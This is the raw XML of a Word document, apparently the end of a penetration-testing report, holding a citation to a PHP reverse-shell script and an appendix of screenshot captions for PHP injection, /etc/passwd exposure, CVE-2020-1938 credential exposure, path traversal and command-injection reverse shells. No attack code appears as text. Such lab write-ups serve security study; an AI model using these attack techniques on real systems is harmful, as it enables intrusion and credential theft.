          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Reverse Shell PHP Source Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online].Github.com [access 16 December, 2025]. Available:  https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="232"/>
    <w:p w14:paraId="2300FD98" w14:textId="6B8C79AD" w:rsidR="002D2757" w:rsidRPr="00D77DFE" w:rsidRDefault="00A72FFA" w:rsidP="00512AA9">
      <w:pP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end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC01DC2" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="002D2757" w:rsidP="002D2757">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="233" w:name="_Toc223521155"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>APPENDIX A</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA9580" w14:textId="32B06EA7" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E4043C9" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="234" w:name="FigureA11"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F6959DE" wp14:editId="77A9536A">
            <wp:extent cx="5399405" cy="3239890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="879466263"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466263" name="Picture 19"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99405" cy="3239890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="234"/>
    </w:p>
    <w:p w14:paraId="7E23CBD6" w14:textId="28CCED6F" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>A.1.1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP Injection Attack</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C613A96" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F358AB" w14:textId="77777777" w:rsidR="00512AA9" w:rsidRDefault="00512AA9" w:rsidP="00DB53DF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="235" w:name="FigureA12"/>
    </w:p>
    <w:p w14:paraId="79D6E942" w14:textId="0724C056" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="00DB53DF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F20B6F" wp14:editId="21AD79F7">
            <wp:extent cx="2038350" cy="4299430"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1564979347" name="Picture 2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79347" name="Picture 21" descr="A screenshot of a computer program&#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38350" cy="4299430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
    </w:p>
    <w:p w14:paraId="4DCC97F6" w14:textId="58BD802F" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Figure A.1.2: PHP Injection exposes /etc/passwd file</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC7A1D9" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F63C50B" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E5B3F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4535"/>
          <w:tab w:val="left" w:pos="7200"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="FigureA21"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="172CCE00" wp14:editId="23DC7F6C">
            <wp:extent cx="2990850" cy="1146919"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6013434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4343" name="Picture 20" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3011333" cy="1154774"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
    </w:p>
    <w:p w14:paraId="6E363E0F" w14:textId="78EB6223" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4535"/>
          <w:tab w:val="left" w:pos="7200"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>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Figure A.2.1: Expose Credential due to CVE‑2020‑1938</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673F9E61" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E22F2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4535"/>
          <w:tab w:val="left" w:pos="7200"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DD1C58" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4535"/>
          <w:tab w:val="left" w:pos="7200"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="FigureA22"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DA2702D" wp14:editId="37F84A24">
            <wp:extent cx="4744528" cy="1908901"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1617181001"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181001" name="Picture 22" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>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758758" cy="1914626"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
    </w:p>
    <w:p w14:paraId="222B47DA" w14:textId="44764C9D" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4535"/>
          <w:tab w:val="left" w:pos="7200"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>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Figure A.2.2: Accessing Tomcat Manager</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38445A25" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="238" w:name="FigureA3"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B91A462" wp14:editId="2D5C2D07">
            <wp:extent cx="4076700" cy="3801185"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="78240170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01703" name="Picture 17"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090239" cy="3813809"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="238"/>
    </w:p>
    <w:p w14:paraId="293E2811" w14:textId="517316EC" w:rsidR="00883F52" w:rsidRPr="00883F52" w:rsidRDefault="00DB53DF" w:rsidP="00883F52">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>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 xml:space="preserve">Figure A.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>File Viewer</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31430260" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3025D34C" w14:textId="77777777" w:rsidR="0027437D" w:rsidRDefault="0027437D" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="FigureA41"/>
    </w:p>
    <w:p w14:paraId="23AC94EA" w14:textId="626DFA3D" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44382ED3" wp14:editId="38A30E72">
            <wp:extent cx="3631721" cy="1579245"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1905"/>
            <wp:docPr id="2698115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11544" name="Picture 11" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId61">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="32738"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3631762" cy="1579263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
    </w:p>
    <w:p w14:paraId="694DC440" w14:textId="47434F80" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>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Figure A.4.1 Command Injection in DNS Lookup Tool</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AB5D3F" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498822EF" w14:textId="77777777" w:rsidR="0027437D" w:rsidRDefault="0027437D" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="240" w:name="FigureA42"/>
    </w:p>
    <w:p w14:paraId="6A335045" w14:textId="52881485" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E1E40FB" wp14:editId="600E448A">
            <wp:extent cx="4062287" cy="1861301"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1888873498" name="Picture 1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73498" name="Picture 13" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId62">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="13088"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4069258" cy="1864495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="240"/>
    </w:p>
    <w:p w14:paraId="7BA11950" w14:textId="7C4DAD53" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="00DB53DF">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>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Figure A.4.2 Command injection reverse shell in DNS Lookup Tool</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
